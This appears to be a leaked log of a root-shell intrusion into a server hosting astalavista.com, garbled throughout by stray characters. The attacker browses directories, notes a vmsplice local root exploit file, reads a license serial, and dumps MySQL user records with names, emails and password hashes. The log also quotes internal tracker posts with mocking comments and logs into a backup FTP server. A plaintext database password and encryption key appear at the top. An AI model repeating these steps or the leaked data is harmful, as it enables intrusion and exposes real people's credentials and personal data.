: a0 D7 c1 | k, W$conxPassword = ‘cXvB3981′; // MySQL password
0 P0 r9 O3 T# N v6 [, w$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish0 i* _# y7 b- h3 {$ c' K [7 L
?>
; {: K M" g5 H F1 n' c% W* i. c+ H5 p. \( n
sh-3.2# cd ..$ D4 ] {2 E. K2 t" A
sh-3.2# cd com
6 A% N. s/ g2 N2 o5 esh-3.2# ls -la' V/ c% {' q m1 `: q8 c
total 141208
7 ]2 g1 U, x. ~+ s3 h; Z# v& Sdrwx–x–x 10 com com 4096 Apr 28 12:40 .8 O# b Y _( w3 ^9 U
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
% L4 a' ~ S* V9 ?4 W/ G% G: q5 Rdrwx—— 2 com com 4096 Jun 4 04:04 backups N0 y/ m9 {7 C, q; ] q' h9 ]
-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql/ C5 j* s8 f2 y: L( t; c
drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system$ n: I/ m& `, z2 y& G) v
-rw——- 1 com com 21880 Jun 2 08:07 .bash_history
5 {4 ?7 E! v( r; _- o. ]- c W-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout8 @* T6 m3 K9 j9 ?8 N O& C, e
-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile
/ r8 ]3 b) `% @-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc
* g# j+ x7 K+ {9 Edrwx–x–x 3 com com 4096 Jan 29 2008 domains2 x' V$ a) F6 m0 }, Y. F" `
-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed0 q: O& I' w1 P& m) f0 x/ o0 {$ x; a
drwxrwx— 3 com mail 4096 Jan 6 19:24 imap
( F1 c5 T+ f2 }+ |# }7 @1 k. Q( M5 I-rw——- 1 com com 69 Nov 18 2008 .lesshst
, R4 @( G% y' f" e* `drwx—— 2 com com 4096 Sep 24 2007 mail8 x b; ^# V( e1 R; D- W
-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history
7 P; E1 t2 P. C7 h6 Q5 ndrwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp
! p* I" e5 `. N0 b9 O/ F& k& ?lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html
- m% q% _) h0 ?0 k6 B-rw-r—– 1 com mail 34 Sep 24 2007 .shadow
4 [3 h$ k1 I4 P: b" ^; edrwx—— 2 com com 4096 Aug 26 2008 .ssh
2 n7 B4 h4 H0 J% z9 q-rwx—— 1 com com 8515 Feb 10 2008 t5 D* h# c% q Z% w8 S
-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c
4 W4 [1 o9 P H) m' ~$ Q' B |; xdrwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp
5 b: s' ?; j( j1 X8 H* n-rw-rw-r– 1 com com 617 May 20 2008 .toprc
$ D. Q% x2 I; N$ Z8 c* w-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql9 d, A/ E7 V+ H$ f3 ^0 `! r+ _ w
-rw——- 1 com com 16629 Mar 28 21:46 .viminfo
R/ |. c; U( O0 M6 d7 L-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc% q% v1 \3 V. f' p
8 p5 X2 S5 X0 [7 ?sh-3.2# head t.c: v n3 ]# c% J
/*
! Q; D5 E2 J0 c* jessica_biel_naked_in_my_bed.c
# \ T, o8 D3 ~ z% B*
/ Y& u% ?. `2 l3 |4 F! C. g+ d4 b* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
: K# k( f: w6 m) t* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.8 w$ }* D# o7 N2 h) g. O* r# u1 k
* Stejnak je to stare jak cyp a aj jakesyk rozbite." Q4 j: B( `# k6 I
*
# _+ q, E7 |% o' b% |+ S9 i* Linux vmsplice Local Root Exploit
; h6 k2 X* X$ ?. k6 V5 z* By qaaz3 t/ U6 j, Q2 N4 q5 K' K2 I
*( J; m2 N" i; J) P' j
- q/ `) U Q% ^* v& c* c$ H# ^
sh-3.2# cd /6 D; y, f9 q ]" x) y) ~
sh-3.2# ls -la' b9 r, f) B! ~6 t
total 360
`: A: d2 i% o6 _drwxr-xr-x 25 root root 4096 Jun 3 02:43 .
5 d& i5 T6 B | @8 P& U, tdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
2 ~+ T3 l& A# \-rw——- 1 root root 10240 Jun 3 02:39 aquota.group
$ `9 L+ Y. Y y3 G4 u-rw——- 1 root root 10240 Jun 3 02:39 aquota.user
5 B) m7 z; b% a8 d; U: F-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db
6 h# r' H& y0 E$ Z% c$ k-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck! Y) R3 E$ q0 L
-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel
6 F1 D$ w+ j4 @2 G" \1 u R" `drwxr-xr-x 3 root root 4096 Dec 29 2007 backup
5 h; E; o7 n* R% T8 i* ddrwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
; R& i c$ q& ?1 H5 |4 Edrwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
! \7 h i2 E. Vdrwxr-xr-x 11 root root 3620 Jun 3 02:43 dev
/ a3 l: e$ Q c# bdrwxr-xr-x 84 root root 12288 Jun 4 03:16 etc8 l# Y$ r: y1 z- D, `: a& w
drwxr-xr-x 14 root root 4096 Mar 11 17:56 home
8 W: O( z# g6 ~" a' }! w-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf- G5 l8 l9 E3 ^( U
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib
" ^6 I9 `4 @+ _drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64
4 l9 V: H7 N1 H4 N; w. u2 ^drwx—— 2 root root 16384 Sep 11 2007 lost+found# s% s& `, c' \6 d& H d
drwxr-xr-x 2 root root 4096 Mar 11 17:56 media; q. Z+ ?* b9 g3 z+ F
drwxr-xr-x 2 root root 0 Jun 3 02:43 misc T8 R x D+ w# {
drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
) m0 j- t; V; B-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg+ e& j! `2 q I- y0 D9 t6 q( R
drwxr-xr-x 2 root root 0 Jun 3 02:43 net
! ]& J# _- y4 a% Pdrwxr-xr-x 3 root root 4096 Mar 11 17:56 opt
) M6 @% N7 g V# s! ~% odr-xr-xr-x 264 root root 0 Jun 3 02:42 proc8 D1 @) g* d8 V' I: r1 a, N
drwxr-x— 15 root root 4096 Jun 4 08:40 root
K: s, w1 I4 h4 D* d4 d: wdrwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin7 z4 I8 o6 D( W
drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux
. }6 |9 d$ G; v8 _6 o: \: Qdrwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
5 {9 n4 H# k/ H; y9 _- hdrwxr-xr-x 11 root root 0 Jun 3 02:42 sys
% T' @1 d' `1 l* z. Fdrwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp
3 i3 u" [* v6 j, l t2 N: M4 z; @5 m& ydrwxr-xr-x 16 root root 4096 Jun 2 13:56 usr1 O9 n8 ^' Z% f8 I/ f+ j4 Q! n
drwxr-xr-x 26 root root 4096 Jun 4 03:16 var2 Z# z& d% i: f2 A2 l
/ o, R0 D4 x" y ^5 l$ d% f% {" @sh-3.2# cd opt
2 b5 b/ |5 F4 s' N8 h! Ash-3.2# ls -la9 `* c/ R) F2 v: n( a2 h
total 208 s' a0 W. ~' s) a; R
drwxr-xr-x 3 root root 4096 Mar 11 17:56 .
; U" A% B" O7 y) tdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
( [( q/ A) [& E% l3 W/ udrwxr-xr-x 15 root root 4096 Mar 20 2008 lsws
/ @1 S+ h4 V# `' G+ w! | F9 y G, p1 B, |; ^% y
sh-3.2# cd lsws/7 e, v) b+ m" h& f7 z, U( n
sh-3.2# ls -la
! q# |6 p; `0 [; y3 _1 o, ytotal 108
$ z$ K! X) |$ Wdrwxr-xr-x 15 root root 4096 Mar 20 2008 ., o1 h. Z" y3 J0 C8 J8 E
drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..
' @0 r9 p1 U0 S1 q4 I" I7 Tdrwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons
$ E8 y, u) Z$ O& vdrwxr-xr-x 13 root root 4096 May 29 15:10 admin/ H9 [. ^0 E% b |* i9 t
drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
; S- W, {; q' `$ J, f) cdrwxr-xr-x 2 root root 4096 May 29 15:10 bin
0 w8 J& ?9 A% u. J2 d; kdrwx—— 4 apache apache 4096 Jun 3 02:43 conf
7 Q7 c7 P4 e2 `8 |4 k( t! d6 {: Pdrwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT0 L: d2 G* ~ C1 ^. h7 V
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs8 |: E+ v, H. @
drwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
* k/ s: `. D odrwxr-xr-x 2 root root 4096 Sep 15 2008 lib" ], q# r3 N* a( C: r+ z
-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE4 D& {( w6 q+ u, t9 ], ]; X
-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP
+ ^: ]0 v4 U, \7 h- m9 }4 ?-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
# z4 [6 \0 \9 Y# v1 o% ^, D0 t9 A9 g-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP
7 w6 s% } ^ D+ s: w) B& V' ?- Kdrwxr-xr-x 2 root root 20480 Jun 4 09:55 logs; a* q9 ]5 h; `5 G8 y# y
drwxr-xr-x 2 root root 4096 Mar 20 2008 php
. Q; H2 i* A+ ]2 Q# ?3 ^drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild
; f6 L0 M' g7 N% ]drwxr-xr-x 3 root root 4096 Mar 20 2008 share
! S/ o7 v7 ~+ {/ B-rw-r–r– 1 root root 6 May 29 15:10 VERSION( ]+ m, D6 k* B% S+ C
3 O6 z* J5 P. \) s+ Ssh-3.2# cd conf
" G* S) h# F: O2 W$ Z( ]sh-3.2# ls -la" S4 ^. o! g$ d& `! |/ p' S$ o
total 48+ x5 U0 o; s) L
drwx—— 4 apache apache 4096 Jun 3 02:43 ., g$ x7 {3 t$ b% X) F
drwxr-xr-x 15 root root 4096 Mar 20 2008 .., l, O8 z2 |& V
drwx—— 2 apache apache 4096 Mar 20 2008 cert
; }1 F" s: @3 e2 f0 ]4 F- D, G8 n& n-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml! G0 {3 z: M/ Q& @* e
-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak3 E. ]5 F/ w* e; ? O4 m' [' D
-rw-r–r– 1 root apache 0 Jun 3 14:11 .last" J/ ^+ {$ t- \; E1 c. r, W
-rw——- 1 apache apache 256 May 29 15:10 license.key
5 |! M. y7 G/ ?+ W4 q5 n) ^-rw——- 1 apache apache 256 Mar 21 2008 license.key.old
) s9 R) j& }3 W-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties6 q8 f2 J5 e" [: T8 Q
-rw——- 1 apache apache 20 May 29 15:10 serial.no
% u T! ~) }1 e3 Y) l: L, Pdrwx—— 2 apache apache 4096 Mar 20 2008 templates+ [6 L: X0 ^+ p+ s! D, K
$ e3 A$ [. x; y- J4 ~$ R( q, Wsh-3.2# cat serial.no& d L, m2 ~5 X; w( u
IbDl-oVsO-CKqL-wVRa
) @8 g7 u2 u7 t. u" n8 g* j% q1 l* J& @! L$ X
sh-3.2# mysql
* N( z7 `. p" b" ZWelcome to the MySQL monitor. Commands end with ; or \g.
2 y, i: x( E6 ~( e) g9 s9 XYour MySQL connection id is 286844
* U: ?0 L9 H' xServer version: 5.0.45-community-log MySQL Community Edition (GPL)
( y: H1 v# g; V8 ]1 v7 R+ ~+ e- c/ \/ q5 F2 A
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
% g7 g/ W( ~7 T9 @; [# `; E+ w9 y) @% P6 [/ D
mysql> show databases;
- ]: G1 q& V3 i; C+———————–+9 v [- ]( \3 g7 n' a" Z8 l
| Database |: v* f9 F% r3 m8 x
+———————–+
1 E; ]- ~) n7 v1 g| information_schema |$ n5 `% g6 O: U/ |& s! _
| astanet_ads |
f! X8 x% d, x5 Q5 || astanet_mailing_lists |
0 O1 e+ E `; W/ U3 c L4 K| astanet_mediawiki |
4 G( ?1 Y( K, E# G" ?. T| astanet_membersystem |% g- {! q8 c T+ Q6 T' A+ e! J6 d
| com_contrexx |5 Z( R7 @! G* p) c
| com_contrexx2 |; Y3 ?% N* W6 ? M
| com_contrexx2_live |
2 v6 X" t$ F0 d- N! P| da_roundcube |. Z1 W- w, P" H
| dolphin |/ Y6 _: R+ r: J- W2 @$ x
| ideapool |
1 |& U" X2 a% D ?| mysql | @" h* M) j. {6 x# _4 X
| test |' H5 L1 T! m) V! ]
| yourmaster |
! }" p# e1 i: J& V* m% y4 O! `' N/ B+———————–+3 I& ~% U8 L l+ d( l/ v
14 rows in set (0.00 sec)
# p3 |7 _# P- L/ i2 E y0 C* b8 F( F# C9 X3 w' Y" S
mysql> use ideapool% ^! L2 a, m- c
Database changed
0 e1 Z9 Q3 H7 K1 q) }mysql> show tables;" @0 B2 ^0 |$ D& n8 h1 U
+———————————–+6 P$ q# y+ |/ s* m$ s9 z/ ~1 h( I
| Tables_in_ideapool |5 H- y$ T$ W h8 n9 {. B/ h) T; X
+———————————–+ A7 X2 I7 l) f
| eventum_columns_to_display |% H0 U4 b3 `3 f. ^
| eventum_custom_field |( }3 T, ?6 i- B: {& K* w
| eventum_custom_field_option |
& O8 r. d( o: C+ c| eventum_custom_filter |
$ J4 {- F1 U( z| eventum_customer_account_manager |
V c1 L3 m% _| eventum_customer_note |
?0 b# L0 ~0 m! Y+ D3 B| eventum_email_account |; O z' K9 J9 Y5 U3 J; x3 K
| eventum_email_draft |
( l/ `2 P. D/ h5 ]' i6 D' A| eventum_email_draft_recipient |$ A& T8 ^! q& A1 U4 Z# F
| eventum_email_response |, R" z( E3 j6 X5 g) W
| eventum_faq |
" u6 I! k" a, l* Y; A# I6 t: G| eventum_faq_support_level |7 ~( q- B+ [% c2 K
| eventum_group |; v# \ j" V. H8 T- X/ w
| eventum_history_type |
2 I9 g0 w; O3 B2 i/ C! I+ ?! T| eventum_irc_notice |& h; i! d7 f) E* I9 V! h8 P
| eventum_issue |
, t3 I9 S. t0 e& [: I& D| eventum_issue_association |' C# T( c* w# L2 e9 r+ P
| eventum_issue_attachment |
$ C7 ~! {. r% _. p/ T$ o' K6 b; m| eventum_issue_attachment_file |0 m2 p# ~9 T- Q" N1 k M5 O9 u; A
| eventum_issue_checkin |7 F+ ?3 S" ?. u* \) x! B8 t
| eventum_issue_custom_field |9 L0 D# I+ n y* Y. k. U4 |
| eventum_issue_history |$ W; ^5 X% w' Z' H
| eventum_issue_quarantine |
7 \' Q. {0 _: N( B/ Y# a$ o U| eventum_issue_requirement |
4 v0 L( o5 }2 ^. M| eventum_issue_user |
* @& `4 R6 `6 u4 W$ v| eventum_issue_user_replier |
8 o% I2 ]" q- N1 \) V; Z| eventum_link_filter |
! c+ N" {$ |4 w" r, @2 {0 s| eventum_mail_queue |" i/ s, v* S3 g M* F( L
| eventum_mail_queue_log |
& j: x+ p$ L2 o| eventum_news |
2 w! A& E$ W2 x' u D; w: m" m| eventum_note |* X& Y4 s& f% B" M* j
| eventum_phone_support |- J5 A1 G0 k3 e. {6 P6 ]
| eventum_project |
( r7 o9 Z! y6 t/ b4 r| eventum_project_category |6 w# {: x) v7 ]/ {
| eventum_project_custom_field |
, H6 B a, ]4 }) u( X7 w| eventum_project_email_response |
8 f$ x" t& Y/ ~% j' d| eventum_project_field_display |* i3 R# W l/ M% p
| eventum_project_group |
1 b# U3 h% q7 m1 R| eventum_project_link_filter |2 e4 F" C2 a$ M; ]3 E% R7 f
| eventum_project_news |9 [# C! g) @8 ?# w% F: L) |
| eventum_project_phone_category |- q2 a1 s" e4 V9 ^
| eventum_project_priority |
' B( f% w' A! y- W; x/ ^, V) f3 ^3 w- O| eventum_project_release |
, }' L' B$ P+ }# Y* N4 N9 C2 ^| eventum_project_round_robin |0 p$ x! m6 C0 \- M1 L. g7 `8 e5 v
| eventum_project_status |5 M* w- F0 h$ j9 Q5 Z9 G" }
| eventum_project_status_date |8 c9 l! d9 [. A& f/ P
| eventum_project_user |+ o2 t8 @6 }6 m- R* `
| eventum_reminder_action |+ k: E3 ~ V- p" x. A
| eventum_reminder_action_list |1 O' o {6 X1 }% `% v2 ^2 n
| eventum_reminder_action_type |
, X. Y' V6 L' U7 l; a0 O2 O| eventum_reminder_field |) a& B4 B: g: z$ h" F0 S- y5 t/ ?7 l
| eventum_reminder_history |6 ?0 b/ ]. ~3 ~2 Y
| eventum_reminder_level |
$ r5 J4 g3 Y# ^ y) t' z6 [9 s| eventum_reminder_level_condition |( s4 D( O- _3 J
| eventum_reminder_operator |
8 R- G0 `6 h! k: ]1 Y| eventum_reminder_priority |
* p5 b* v( r. [. h6 c U: E| eventum_reminder_requirement |
. b- t: e) e$ [- B% n6 W| eventum_reminder_triggered_action |
4 M( q' Z* ~, V9 ~# }( C( a| eventum_resolution |& E7 C$ S! o3 @& r+ L3 `0 p
| eventum_round_robin_user |
; }9 Q% r6 L6 y, C1 v| eventum_search_profile |
1 W6 A( z$ x- U9 r6 S| eventum_status |
8 d, Z: b: z4 [. @& [6 i| eventum_subscription | j! T5 v& `4 d
| eventum_subscription_type |
7 Y; W. b8 B4 Q! t/ T- P4 n| eventum_support_email |
5 j; q3 K# ]! W' n4 R6 ~| eventum_support_email_body |
5 `3 }% i, X' `' E' w| eventum_time_tracking |
8 W/ g% m d; w( W| eventum_time_tracking_category |) O9 v2 C( i4 D2 D* \: o9 H. o1 r& t
| eventum_user |- b. E6 m. _* F% P! Y
+———————————–+
5 E1 G6 C, s2 Z/ |6 O7 `6 a69 rows in set (0.00 sec)7 h) ?+ N+ r# l8 j
$ w/ L; @! X- ~- Y9 kmysql> describe eventum_user;
% {$ S* z q& _" h5 T+————————-+——————+——+—–+———————+—————-+
, E, A0 \1 C$ k7 u6 h' x# @| Field | Type | Null | Key | Default | Extra |
$ K( A( q( n! J9 s) f- A+————————-+——————+——+—–+———————+—————-+: m9 z) Y* y& h2 N
| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |
3 Q E4 f6 A6 Q. P2 a| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |9 _# R0 l$ u' }5 L. l6 |
| usr_customer_id | int(11) unsigned | YES | | NULL | |
, G, v( _8 W9 a8 Z| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |
9 Q3 Y& V3 V8 J c- Y| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |1 ?+ O* s& ]& ?, s2 _2 k( v
| usr_status | varchar(8) | NO | | active | |" P( E! s" m- T; B _! f! z$ h: W( Q& o
| usr_password | varchar(32) | NO | | | |3 |( h9 p4 @2 z
| usr_full_name | varchar(255) | NO | | | |8 g- a+ ~& ^4 J1 p# b% N
| usr_email | varchar(255) | NO | UNI | | |
7 O( m2 | A, \| usr_preferences | longtext | YES | | NULL | |
6 l; ~' h& P2 [8 w0 F p4 C" D* x| usr_sms_email | varchar(255) | YES | | NULL | |
+ P9 V1 r) J. F: N! v/ |2 G| usr_clocked_in | tinyint(1) | YES | | 0 | |" T9 i; y0 z! ?8 {5 D: e
| usr_lang | varchar(5) | YES | | NULL | |
# M: k4 s; D9 ~. F$ N& o+————————-+——————+——+—–+———————+—————-+
% V% `; E( l3 P( |# Q# U; S3 R6 G13 rows in set (0.00 sec)0 f+ G6 p( H A. x0 m! v
5 ?( V9 B6 k; ]& {8 C% r
mysql> select usr_full_name,usr_email,usr_password from eventum_user;; D. o# ^3 }" J& X6 |* G
+———————-+——————————-+———————————-+
* A# a1 @* C5 r$ v| usr_full_name | usr_email | usr_password |7 e# p& O: } I/ k+ |
+———————-+——————————-+———————————-+
7 [0 a7 Z$ _" h2 {! h, F" w1 G| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |: C2 ^6 N& w e+ N4 U3 O
| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |* ^4 _6 a" P3 F% R6 h1 b1 E4 F
| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |$ {# A' \3 @( \+ x% n
| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
- c- n7 w6 M8 k; _5 Y| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |( V! M% Y" ^4 p) }
| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |& [7 z: w/ l6 W9 K, A6 s5 g
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |
s0 Q) n6 n' o| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
/ M& ]. k& K$ e8 z| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |
v* D, Y5 x1 w& m9 W| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |
' k7 A) M. J: g Q2 B6 c| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |
) c# h& |* h2 R: s6 o| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |* S6 w2 I$ {' |5 c3 e
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |8 P5 E6 b; I3 |4 H: G4 u
| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |
S, T, K, e- N7 q| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |" ~% v: x& L* c
+———————-+——————————-+———————————-+6 H7 q6 c1 ]( N2 D, q3 B h
15 rows in set (0.00 sec)
b- {& H# n2 L: O: k% l% {. l1 B
# U9 x' B% n) o; C7 {4 }mysql> select iss_description from eventum_issue where iss_id = 43;
9 ~$ ?, `1 P7 H% C0 V K! d y2 f+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+; _. ]9 {. H5 O
| iss_description
' \: ^9 j$ W$ q( J; S2 m|
C/ K: H7 z! i) ?$ s( v; D+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+; S/ F' h6 Q, D0 P, s% |
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be
' I! f1 y5 w* {( M0 Z/ S& oconnected for 90 mins… 120mins… so what i propose is something like:1 e. G* u( Z2 T8 A
链接标记[url]http://www.surfthechannel.com/[/url]" h& ]1 O2 u, h' Y/ ^
since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system
$ d7 j. p3 x+ ]8 [) R( g3 Clike podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
9 ^+ o- R8 V. e, ^4 Zbreak any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off& h0 \0 ]1 [+ ], A4 [1 z) r, K& d
if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…, L1 G: w" j& E, i
# T. k0 ]6 j/ |( nWe could also put advertisement during play on the flash video player itself… extra $$…7 q/ o8 F t3 v9 ?4 `
, {& }1 c' B- }
By sykadul |
6 z, R2 U8 X& H& d- q* k; R+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+; N9 a/ b# I) l+ |2 P
1 row in set (0.00 sec)) v0 [" N! ?7 I# U$ w3 Y
. {$ {: J0 Q* [* X' z// Money and extra $$ is all they care about. remember that.
. Z9 A# z& q8 v
5 _0 N. n! v2 Q0 pmysql> select iss_summary,iss_description from eventum_issue where iss_id =42;0 h4 N- }+ R$ W8 K9 t
+————————+——————————————————————————————————————————————————————————————————————————————-+1 @* t; ?/ Y2 N3 p' _8 o
| iss_summary | iss_description
: X8 C6 I; r/ s# d0 _/ F: j|
' @! \6 P* V% O6 w" s( X" ]+————————+——————————————————————————————————————————————————————————————————————————————-+# J- z2 g; ] d0 x
| Forum for REAL EXPERTS | Hello,
+ r- D) J: r$ _/ O- `+ E* T/ R$ o" {8 i7 a$ ]
Ishtus and I,
7 X, ]# ?# R& l# T9 k% B
+ K0 v$ y% x8 J8 D! @Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
& \0 z% \1 e" C/ H4 X) M! QONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
$ P' I& ?) d4 k) {0 n9 B; Z3 K6 E3 R# D! Q5 F6 ]; m$ {
One example a friend of mine from coresecurity.com!( Z% ?" _ u. ^& }' D
: Z- T' L1 B$ { \We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..
' Y1 n. y2 [, l$ c. b/ ^0 I" n. O3 ~# m+ s6 B. f q: n: O
|
6 E4 ?9 J' n- ~# E& }+————————+——————————————————————————————————————————————————————————————————————————————+/ u' W5 C. u( l; \# q' `
1 row in set (0.00 sec)2 J! @6 ?! h1 u. A# j
( g% e9 I7 A+ z0 D" l" M# ^
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…1 y! l1 j# a; Q9 v4 Y; b
7 N/ Q1 t% w# o0 Q k @
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;, b5 C" C+ L4 y0 z" K" l. a8 H3 y
+——————+———————————————————————————————+5 p: \0 D. p* z; M
| iss_summary | iss_description |0 f+ X$ m; s3 J% }$ i
+——————+———————————————————————————————+$ F7 a# r3 D9 A; b
| Website guidance | Virtual Girl which guides you trought the website.
- G, m2 O2 k. \/ @4 o- Z
9 x6 P3 l% i2 [# _: \! i& eWe need a girl with who you can ( talk )!!!$ z+ x$ E, u/ D3 N
Also for the News!" g4 I1 o8 q6 P3 w
So my suggestion is a girl who read you the news loud if you like!
: Y$ Q% l" k9 o" |7 R6 `& ^3 o* Syou can choose between read yourselfe or she read it for you or both!* F& [- } i+ y7 x8 M- T
6 m8 {. t% ?; B) T- c! Z2 _5 nGo to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!+ H) h3 ]" |" k2 E/ \4 F6 i
' L# k; F+ m* N6 w0 ^Have a look on the example girls!!. k6 b( }. ], x9 n. J1 o; f& M3 }
( g8 @& ]1 P5 z2 ]
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]( s+ N- E& `7 v' n# |' c. B% h
' Q' I5 p( C8 \
or that
3 Z8 f; y% A- {7 A
`! H% |1 }0 V% j4 G# N链接标记[url]http://www.yellostrom.de/[/url]9 U; O' f* }) H4 z/ _- u
! C' d( M a5 e7 Z# }
|) f) J2 d9 a y: A& D7 S. q
+——————+———————————————————————————————+
, K; c0 u& y, F. ?8 w3 Q$ h1 row in set (0.00 sec)
$ o/ m9 I- f& j0 H* M
0 L* T2 p; c2 C7 j// ha ha.
; n5 N% i, L/ ^. F' l% H5 a* q w* ]
# s" {2 ^5 L& y% B2 @* p/ Q& Nmysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;! F# Y# M$ W! H/ W, l' z
+————————–+———————————————————————————————————–+
' p9 y0 V. P1 I: ]& [| iss_summary | iss_description |: E& b z/ X' A6 g2 i. ]
+————————–+———————————————————————————————————–+
$ P x" r& ^6 l3 j| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |0 i4 c9 A! p7 f
+————————–+———————————————————————————————————–+
, h/ b7 U+ F; {9 \2 r- J1 row in set (0.00 sec)
( b- Z" z) T* @1 u* l; [& }# B1 i. o' z6 S B7 d
// LOL./ Z; T& s) B. e8 [$ M
0 B1 z6 t' r$ m1 n
mysql> exit
- Q" f; x5 c- ?. i$ q; D7 WBye
$ s! U4 I' J& u
! V4 p" l v/ v4 a- ssh-3.2# ftp 212.254.194.163% M# a* b3 J) U5 g8 A
Connected to 212.254.194.163.& e$ J5 M) m2 H( d7 w
220 BackupCOM_VW FTP server ready.# Y H2 I; d+ Z
504 AUTH: security mechanism ‘GSSAPI’ not supported.$ t- L! ~3 S( p5 S; A9 k$ P2 F g& w
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.: R4 |* O3 {- F
KERBEROS_V4 rejected as an authentication type3 e; T+ k4 Q& B0 g9 U# u& H/ X
Name (212.254.194.163:root): astalavista.com
3 j6 {3 m! C, N4 H/ J331 Password required for astalavista.com.4 P0 |% z2 f' j: v' f0 a* v5 R5 ]
Password:$ m1 a& h5 S" e1 C, I1 K
230 User astalavista.com logged in.
. J' m T/ m/ nRemote system type is UNIX.- u. M. o k6 s
Using binary mode to transfer files.
5 ]; y* S3 U' l. j" n; f) s7 sftp> ls -la: W6 h: k: T& ^' R3 U- `# a
227 Entering Passive Mode (212,254,194,163,2,188)/ p$ C2 U$ y- c
150 Opening BINARY mode data connection for ‘file list’.
